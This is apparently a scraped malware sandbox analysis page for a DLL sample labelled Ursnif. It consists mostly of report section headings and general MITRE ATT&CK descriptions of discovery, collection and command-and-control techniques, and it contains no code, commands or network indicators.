Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report NJPcHPuRcG.dll

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Ursnif

Yara Overview

Memory Dumps

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Exports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre